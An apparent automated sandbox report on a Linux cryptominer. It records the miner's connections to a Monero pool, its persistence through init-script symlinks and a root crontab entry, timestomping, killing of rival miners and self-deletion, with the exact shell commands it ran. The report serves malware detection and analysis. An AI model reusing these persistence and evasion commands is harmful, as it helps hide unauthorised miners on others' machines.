
Analysis Report

Overview

General Information

Joe Sandbox Version: 22.0.0
Analysis ID: 570664
Start time: 15:19:08
Joe Sandbox Product: Cloud
Start date: 31.05.2018
Overall analysis duration: 0h 3m 52s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: coinminer
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: CentOS Linux 7.4 x64 (Kernel 3.10.0-693, Firefox 52.6.0, Document Viewer 3.22.1)
Detection: MAL
Classification: mal80.evad.mine.troj.lin@0/12@2/0

Detection

Strategy: Threshold
Score: 80
Range: 0 - 100
Detection: malicious

Classification

Signature Overview



AV Detection:

Antivirus detection for dropped file
Source: /usr/bin/wipefs; Avira: Label: PUA/Linux.CoinMiner.mpona
Antivirus detection for submitted file
Source: coinminer; Avira: Label: PUA/Linux.CoinMiner.mpona

Bitcoin Miner:

Found strings related to Crypto-Mining
Source: coinminer; String found in binary or memory: ps -ef | grep stratum+tcp | awk '{print $2}' | xargs kill -9 >/dev/null 2>&1
Source: coinminer; String found in binary or memory: cryptonight

Networking:

Detected TCP or UDP traffic on non-standard ports
Source: global traffic; TCP traffic: 192.168.1.101:39526 -> 163.17.30.212:8525
Source: global traffic; TCP traffic: 192.168.1.101:55686 -> 37.59.43.131:4444
Performs DNS lookups
Source: unknown; DNS traffic detected: queries for: pool.minexmr.com
Urls found in memory or binary data
Source: coinminer; String found in binary or memory: file://
Source: coinminer; String found in binary or memory: file://hostname/
Source: coinminer; String found in binary or memory: ftp://
Source: coinminer; String found in binary or memory: ftp://%s:%s
Source: coinminer; String found in binary or memory: ftp://;type=;type=%cAccept:Could
Source: coinminer; String found in binary or memory: http://gcc.gnu.org/bugs.html):
Source: coinminer; String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html

Persistence and Installation Behavior:

Executes the "rm" command used to delete files or directories
Source: /bin/sh (PID: 5925); Rm executable: /bin/rm -> rm /tmp/tmpnam_KEKnmE
Sample tries to persist itself using System V runlevels
Source: /bin/cp (PID: 5606); File: /etc/rc.d/init.d/acpidtd
Source: /bin/ln (PID: 5617); File: /etc/rc0.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5625); File: /etc/rc1.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5633); File: /etc/rc2.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5642); File: /etc/rc3.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5650); File: /etc/rc4.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5659); File: /etc/rc5.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5668); File: /etc/rc6.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5677); File: /etc/rc.d/rc0.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5685); File: /etc/rc.d/rc1.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5696); File: /etc/rc.d/rc2.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5705); File: /etc/rc.d/rc3.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5714); File: /etc/rc.d/rc4.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5722); File: /etc/rc.d/rc5.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5736); File: /etc/rc.d/rc6.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5481); File: /etc/rc0.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5490); File: /etc/rc1.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5498); File: /etc/rc2.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5507); File: /etc/rc3.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5520); File: /etc/rc4.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5529); File: /etc/rc5.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5538); File: /etc/rc6.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5546); File: /etc/rc.d/rc0.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5556); File: /etc/rc.d/rc1.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5565); File: /etc/rc.d/rc2.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5573); File: /etc/rc.d/rc3.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5581); File: /etc/rc.d/rc4.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5590); File: /etc/rc.d/rc5.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5599); File: /etc/rc.d/rc6.d/S01wipefs -> /etc/init.d/wipefs
Sample tries to persist itself using cron
Source: /bin/sh (PID: 5632); File: /etc/crontab
Executes commands using a shell command-line interpreter
Source: /tmp/coinminer (PID: 5461); Shell command executed: sh -c "/tmp/tmpnam_KEKnmE upgrade >/dev/null 2>&1; rm /tmp/tmpnam_KEKnmE >/dev/null 2>&1"
Source: /tmp/coinminer (PID: 5455); Shell command executed: sh -c "cp -f /tmp/coinminer /bin/wipefs>/dev/null 2>&1\nln -fs /bin/wipefs /etc/init.d/wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipefs /etc/rc0.d/S01wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipefs /etc/rc1.d/S01wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipefs /etc/rc2.d/S01wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipefs /etc/rc3.d/S01wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipefs /etc/rc4.d/S01wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipefs /etc/rc5.d/S01wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipef"
Source: /tmp/coinminer (PID: 5618); Shell command executed: sh -c "cat /etc/crontab"
Source: /tmp/coinminer (PID: 5632); Shell command executed: sh -c "echo '0 */6 * * * root /bin/wipefs' >> /etc/crontab"
Source: /tmp/coinminer (PID: 5640); Shell command executed: sh -c "sysctl -w vm.nr_hugepages=128 >/dev/null 2>&1"
Source: /tmp/coinminer (PID: 5667); Shell command executed: sh -c "sysctl -p >/dev/null 2>&1"
Source: /tmp/coinminer (PID: 5694); Shell command executed: sh -c "(touch /tmp/tmplog; chmod 666 /tmp/tmplog) >/dev/null 2>&1"
Source: /tmp/coinminer (PID: 6121); Shell command executed: sh -c "ps -ef | grep stratum+tcp | awk '{print $2}' | xargs kill -9 >/dev/null 2>&1"
Source: /tmp/coinminer (PID: 6218); Shell command executed: sh -c "ps -ef | grep stratum+tcp | awk '{print $2}' | xargs kill -9 >/dev/null 2>&1"
Executes the "chmod" command used to modify permissions
Source: /tmp/tmpnam_KEKnmE (PID: 5595); Chmod executable: /bin/chmod -> chmod +x /sbin/scss
Source: /tmp/tmpnam_KEKnmE (PID: 5827); Chmod executable: /bin/chmod -> chmod +x /bin/scnetstat
Source: /bin/sh (PID: 5724); Chmod executable: /bin/chmod -> chmod 666 /tmp/tmplog
Executes the "grep" command used to find patterns in files or piped streams
Source: /tmp/tmpnam_KEKnmE (PID: 5828); Grep executable: /bin/grep -> grep processor /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 5848); Grep executable: /bin/grep -> grep "model name" /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 6170); Grep executable: /bin/grep -> grep processor /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 6174); Grep executable: /bin/grep -> grep "model name" /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 6267); Grep executable: /bin/grep -> grep processor /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 6271); Grep executable: /bin/grep -> grep "model name" /proc/cpuinfo
Source: /bin/sh (PID: 6123); Grep executable: /bin/grep -> grep stratum+tcp
Source: /bin/sh (PID: 6220); Grep executable: /bin/grep -> grep stratum+tcp
Executes the "kill" command typically used to terminate processes
Source: /bin/xargs (PID: 6129); Kill executable: /bin/kill -> kill -9 6121 6123
Source: /bin/xargs (PID: 6224); Kill executable: /bin/kill -> kill -9 6218 6220
Executes the "ps" command used to list the status of processes
Source: /bin/sh (PID: 6122); Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 6219); Ps executable: /bin/ps -> ps -ef
Executes the "touch" command used to create files or modify time stamps
Source: /tmp/tmpnam_KEKnmE (PID: 5584); Touch executable: /bin/touch -> touch -r /bin/sh /bin/ddus-uidgen /etc/init.d/acpidtd /etc/rc.d/rc0.d/S01acpidtd /etc/rc.d/rc1.d/S01acpidtd /etc/rc.d/rc2.d/S01acpidtd /etc/rc.d/rc3.d/S01acpidtd /etc/rc.d/rc4.d/S01acpidtd /etc/rc.d/rc5.d/S01acpidtd /etc/rc.d/rc6.d/S01acpidtd
Source: /tmp/tmpnam_KEKnmE (PID: 5641); Touch executable: /bin/touch -> touch -r /bin/sh /sbin/ss /sbin/scss
Source: /tmp/tmpnam_KEKnmE (PID: 5854); Touch executable: /bin/touch -> touch -r /bin/sh /bin/netstat /bin/scnetstat
Source: /bin/sh (PID: 5609); Touch executable: /bin/touch -> touch -r /bin/sh /bin/wipefs /etc/init.d/wipefs /etc/rc.d/rc0.d/S01wipefs /etc/rc.d/rc1.d/S01wipefs /etc/rc.d/rc2.d/S01wipefs /etc/rc.d/rc3.d/S01wipefs /etc/rc.d/rc4.d/S01wipefs /etc/rc.d/rc5.d/S01wipefs /etc/rc.d/rc6.d/S01wipefs
Source: /bin/sh (PID: 5711); Touch executable: /bin/touch -> touch /tmp/tmplog
Reads system information from the proc file system
Source: /bin/sh (PID: 5461); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5488); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5497); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5515); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5524); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5548); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5558); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5584); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5749); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5766); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5774); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5790); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5798); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5820); Reads from proc file: /proc/meminfo
Source: /bin/grep (PID: 5828); Reads from proc file: /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 5839); Reads from proc file: /proc/meminfo
Source: /bin/grep (PID: 5848); Reads from proc file: /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 5860); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 6169); Reads from proc file: /proc/meminfo
Source: /bin/grep (PID: 6170); Reads from proc file: /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 6173); Reads from proc file: /proc/meminfo
Source: /bin/grep (PID: 6174); Reads from proc file: /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 6176); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 6266); Reads from proc file: /proc/meminfo
Source: /bin/grep (PID: 6267); Reads from proc file: /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 6270); Reads from proc file: /proc/meminfo
Source: /bin/grep (PID: 6271); Reads from proc file: /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 6273); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5473); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5489); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5499); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5522); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5530); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5550); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5559); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5585); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5607); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5649); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5666); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5675); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5688); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5693); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5712); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5729); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5747); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5763); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5772); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5789); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5797); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5818); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5837); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5862); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5877); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5884); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5898); Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5909); Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 5455); Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 5618); Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 5632); Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 5640); Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 5667); Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 5694); Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 6121); Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 6122); Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 6122); Reads from proc file: /proc/stat
Source: /bin/sh (PID: 6218); Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 6219); Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 6219); Reads from proc file: /proc/stat
Sample tries to set the executable flag
Source: /tmp/coinminer (PID: 5454); File: /tmp/tmpnam_KEKnmE (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 5595); File: /sbin/scss (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 5827); File: /bin/scnetstat (bits: - usr: rx grp: rx all: rwx)

System Summary:

Sample contains strings that are potentially command strings
Source: Initial sample; Potential command found: w L3T$
Source: Initial sample; Potential command found: ps -ef | grep stratum+tcp | awk '{print $2}' | xargs kill -9 >/dev/null 2>&1
Source: Initial sample; Potential command found: sysctl -w vm.nr_hugepages=128 >/dev/null 2>&1
Source: Initial sample; Potential command found: cd ~/ && cp -f %s .wipefs &&(crontab -l; echo "0 */6 * * * `pwd`/.wipefs") | crontab - >/dev/null 2>&1
Source: Initial sample; Potential command found: echo '0 */6 * * * root /bin/wipefs' >> /etc/crontab
Source: Initial sample; Potential command found: cat /etc/crontab
Source: Initial sample; Potential command found: sysctl -p >/dev/null 2>&1
Source: Initial sample; Potential command found: crontab -l
Source: Initial sample; Potential command found: X []A\A]A^A_
Source: Initial sample; Potential command found: X %FuI
Source: Initial sample; Potential command found: X Fu
Source: Initial sample; Potential command found: w FuI1K
Source: Initial sample; Potential command found: w VG.%_
Source: Initial sample; Potential command found: ftp server doesn't support SIZE
Source: Initial sample; Potential command found: cp -f %s /bin/wipefs>/dev/null 2>&1
Source: Initial sample; Potential command found: ln -fs /bin/wipefs /etc/init.d/wipefs>/dev/null 2>&1
Source: Initial sample; Potential command found: ln -fs /etc/init.d/wipefs /etc/rc0.d/S01wipefs>/dev/null 2>&1
Source: Initial sample; Potential command found: ln -fs /etc/init.d/wipefs /etc/rc1.d/S01wipefs>/dev/null 2>&1
Source: Initial sample; Potential command found: ln -fs /etc/init.d/wipefs /etc/rc2.d/S01wipefs>/dev/null 2>&1
Source: Initial sample; Potential command found: ln -fs /etc/init.d/wipefs /etc/rc3.d/S01wipefs>/dev/null 2>&1
Source: Initial sample; Potential command found: ln -fs /etc/init.d/wipefs /etc/rc4.d/S01wipefs>/dev/null 2>&1
Source: Initial sample; Potential command found: ln -fs /etc/init.d/wipefs /etc/rc5.d/S01wipefs>/dev/null 2>&1
Source: Initial sample; Potential command found: ln -fs /etc/init.d/wipefs /etc/rc6.d/S01wipefs>/dev/null 2>&1
Source: Initial sample; Potential command found: ln -fs /etc/init.d/wipefs /etc/rc.d/rc0.d/S01wipefs>/dev/null 2>&1
Source: Initial sample; Potential command found: ln -fs /etc/init.d/wipefs /etc/rc.d/rc1.d/S01wipefs>/dev/null 2>&1
Source: Initial sample; Potential command found: ln -fs /etc/init.d/wipefs /etc/rc.d/rc2.d/S01wipefs>/dev/null 2>&1
Source: Initial sample; Potential command found: ln -fs /etc/init.d/wipefs /etc/rc.d/rc3.d/S01wipefs>/dev/null 2>&1
Source: Initial sample; Potential command found: ln -fs /etc/init.d/wipefs /etc/rc.d/rc4.d/S01wipefs>/dev/null 2>&1
Source: Initial sample; Potential command found: ln -fs /etc/init.d/wipefs /etc/rc.d/rc5.d/S01wipefs>/dev/null 2>&1
Source: Initial sample; Potential command found: ln -fs /etc/init.d/wipefs /etc/rc.d/rc6.d/S01wipefs>/dev/null 2>&1
Source: Initial sample; Potential command found: touch -r /bin/sh /bin/wipefs /etc/init.d/wipefs /etc/rc.d/rc*.d/S01wipefs>/dev/null 2>&1
Sample has stripped symbol table
Source: ELF static info symbol of initial sample; .symtab present: no
Classification label
Source: classification engine; Classification label: mal80.evad.mine.troj.lin@0/12@2/0

Hooking and other Techniques for Hiding and Protection:

Sample deletes itself
Source: /bin/rm (PID: 5925); File: /tmp/tmpnam_KEKnmE


Runtime Messages

Command: /tmp/coinminer
Exit Code: 0
Exit Code Info:
Killed: False
Standard Output:
Standard Error:

Behavior Graph


Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
Behavior graph (image not reproduced). Graph ID: 570664, Sample: coinminer, Startdate: 31/05/2018, Architecture: LINUX, Score: 80. Network nodes: 163.17.30.212 (ports 39526, 39530, 39532; ERX-TANET-ASN1 Taiwan Academic Network, Taiwan) and pool.minexmr.com / 37.59.43.131 (ports 4444, 55686; OVH, France). Dropped files shown in the graph: /tmp/tmpnam_KEKnmE (ELF), /etc/crontab (ASCII), /usr/bin/wipefs (ELF), /etc/rc.d/init.d/acpidtd (ELF). Signatures shown in the graph: Antivirus detection for dropped file, Antivirus detection for submitted file, Found strings related to Crypto-Mining, Detected TCP or UDP traffic on non-standard ports, Sample tries to persist itself using cron, Sample tries to persist itself using System V runlevels, Sample deletes itself, Executes the "rm" command used to delete files or directories.

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Antivirus Detection

Initial Sample

Source: coinminer; Detection: 100%; Scanner: Avira; Label: PUA/Linux.CoinMiner.mpona

Dropped Files

Source: /usr/bin/wipefs; Detection: 100%; Scanner: Avira; Label: PUA/Linux.CoinMiner.mpona

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Startup

  • system is lnxcentos1
  • coinminer (PID: 5451, Parent: 5410, MD5: 9a0629bbb97ef2c2fd8369778aa9a0d3)
    • coinminer New Fork (PID: 5454, Parent: 5451)
      • sh (PID: 5461, Parent: 5454, MD5: df0d31d6acbb7862916223a26cc45da0)
        • sh New Fork (PID: 5465, Parent: 5461)
        • tmpnam_KEKnmE (PID: 5465, Parent: 5461, MD5: eafef5b086d1e5940ab27a617e48b7c4)
          • tmpnam_KEKnmE New Fork (PID: 5472, Parent: 5465)
            • tmpnam_KEKnmE New Fork (PID: 5479, Parent: 5472)
              • tmpnam_KEKnmE New Fork (PID: 5488, Parent: 5479)
                • tmpnam_KEKnmE New Fork (PID: 5497, Parent: 5488)
                  • which (PID: 5506, Parent: 5497, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
                • which (PID: 5515, Parent: 5488, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
                • tmpnam_KEKnmE New Fork (PID: 5524, Parent: 5488)
                  • which (PID: 5537, Parent: 5524, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
                • which (PID: 5548, Parent: 5488, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
                • tmpnam_KEKnmE New Fork (PID: 5558, Parent: 5488)
                  • chattr (PID: 5567, Parent: 5558, MD5: 429aabf876ae1d2fa2459219366d273c)
                • tmpnam_KEKnmE New Fork (PID: 5584, Parent: 5488)
                  • cp (PID: 5597, Parent: 5584, MD5: afc7c3ab2546d6d8a98854dcaaa731b3)
                  • cp (PID: 5606, Parent: 5584, MD5: afc7c3ab2546d6d8a98854dcaaa731b3)
                  • ln (PID: 5617, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                  • ln (PID: 5625, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                  • ln (PID: 5633, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                  • ln (PID: 5642, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                  • ln (PID: 5650, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                  • ln (PID: 5659, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                  • ln (PID: 5668, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                  • ln (PID: 5677, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                  • ln (PID: 5685, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                  • ln (PID: 5696, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                  • ln (PID: 5705, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                  • ln (PID: 5714, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                  • ln (PID: 5722, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                  • ln (PID: 5736, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                • touch (PID: 5584, Parent: 5488, MD5: 985a951b1a7a8dbe51973e651a365900)
                • tmpnam_KEKnmE New Fork (PID: 5749, Parent: 5488)
                  • which (PID: 5757, Parent: 5749, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
                • which (PID: 5766, Parent: 5488, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
                • tmpnam_KEKnmE New Fork (PID: 5774, Parent: 5488)
                  • which (PID: 5782, Parent: 5774, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
                • which (PID: 5790, Parent: 5488, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
                • tmpnam_KEKnmE New Fork (PID: 5798, Parent: 5488)
                  • chattr (PID: 5806, Parent: 5798, MD5: 429aabf876ae1d2fa2459219366d273c)
                • tmpnam_KEKnmE New Fork (PID: 5820, Parent: 5488)
                  • grep (PID: 5828, Parent: 5820, MD5: 6cd81dedcf076b9ad7cfbfec976245d5)
                  • uniq (PID: 5829, Parent: 5820, MD5: a83f5f379d810462d528dc460d63a04b)
                  • wc (PID: 5830, Parent: 5820, MD5: 1304115f965d6c9062947a3b35d9e140)
                • tmpnam_KEKnmE New Fork (PID: 5839, Parent: 5488)
                  • grep (PID: 5848, Parent: 5839, MD5: 6cd81dedcf076b9ad7cfbfec976245d5)
                  • uniq (PID: 5849, Parent: 5839, MD5: a83f5f379d810462d528dc460d63a04b)
                • uname (PID: 5860, Parent: 5488, MD5: 81136bf3b923238a5420a003d585a68f)
                • tmpnam_KEKnmE New Fork (PID: 6169, Parent: 5488)
                  • grep (PID: 6170, Parent: 6169, MD5: 6cd81dedcf076b9ad7cfbfec976245d5)
                  • uniq (PID: 6171, Parent: 6169, MD5: a83f5f379d810462d528dc460d63a04b)
                  • wc (PID: 6172, Parent: 6169, MD5: 1304115f965d6c9062947a3b35d9e140)
                • tmpnam_KEKnmE New Fork (PID: 6173, Parent: 5488)
                  • grep (PID: 6174, Parent: 6173, MD5: 6cd81dedcf076b9ad7cfbfec976245d5)
                  • uniq (PID: 6175, Parent: 6173, MD5: a83f5f379d810462d528dc460d63a04b)
                • uname (PID: 6176, Parent: 5488, MD5: 81136bf3b923238a5420a003d585a68f)
                • tmpnam_KEKnmE New Fork (PID: 6266, Parent: 5488)
                  • grep (PID: 6267, Parent: 6266, MD5: 6cd81dedcf076b9ad7cfbfec976245d5)
                  • uniq (PID: 6268, Parent: 6266, MD5: a83f5f379d810462d528dc460d63a04b)
                  • wc (PID: 6269, Parent: 6266, MD5: 1304115f965d6c9062947a3b35d9e140)
                • tmpnam_KEKnmE New Fork (PID: 6270, Parent: 5488)
                  • grep (PID: 6271, Parent: 6270, MD5: 6cd81dedcf076b9ad7cfbfec976245d5)
                  • uniq (PID: 6272, Parent: 6270, MD5: a83f5f379d810462d528dc460d63a04b)
                • uname (PID: 6273, Parent: 5488, MD5: 81136bf3b923238a5420a003d585a68f)
          • tmpnam_KEKnmE New Fork (PID: 5473, Parent: 5465)
            • which (PID: 5480, Parent: 5473, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • which (PID: 5489, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • tmpnam_KEKnmE New Fork (PID: 5499, Parent: 5465)
            • which (PID: 5509, Parent: 5499, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • which (PID: 5522, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • tmpnam_KEKnmE New Fork (PID: 5530, Parent: 5465)
            • which (PID: 5541, Parent: 5530, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • which (PID: 5550, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • tmpnam_KEKnmE New Fork (PID: 5559, Parent: 5465)
            • chattr (PID: 5568, Parent: 5559, MD5: 429aabf876ae1d2fa2459219366d273c)
          • tmpnam_KEKnmE New Fork (PID: 5585, Parent: 5465)
            • chmod (PID: 5595, Parent: 5585, MD5: 7c556d30bb69995e4844f5e319e8c303)
          • tmpnam_KEKnmE New Fork (PID: 5607, Parent: 5465)
            • cp (PID: 5615, Parent: 5607, MD5: afc7c3ab2546d6d8a98854dcaaa731b3)
            • touch (PID: 5641, Parent: 5607, MD5: 985a951b1a7a8dbe51973e651a365900)
          • tmpnam_KEKnmE New Fork (PID: 5649, Parent: 5465)
            • which (PID: 5658, Parent: 5649, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • which (PID: 5666, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • tmpnam_KEKnmE New Fork (PID: 5675, Parent: 5465)
            • which (PID: 5678, Parent: 5675, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • which (PID: 5688, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • tmpnam_KEKnmE New Fork (PID: 5693, Parent: 5465)
            • chattr (PID: 5703, Parent: 5693, MD5: 429aabf876ae1d2fa2459219366d273c)
          • tmpnam_KEKnmE New Fork (PID: 5712, Parent: 5465)
            • which (PID: 5721, Parent: 5712, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • which (PID: 5729, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • tmpnam_KEKnmE New Fork (PID: 5747, Parent: 5465)
            • which (PID: 5755, Parent: 5747, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • which (PID: 5763, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • tmpnam_KEKnmE New Fork (PID: 5772, Parent: 5465)
            • which (PID: 5780, Parent: 5772, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • which (PID: 5789, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • tmpnam_KEKnmE New Fork (PID: 5797, Parent: 5465)
            • chattr (PID: 5805, Parent: 5797, MD5: 429aabf876ae1d2fa2459219366d273c)
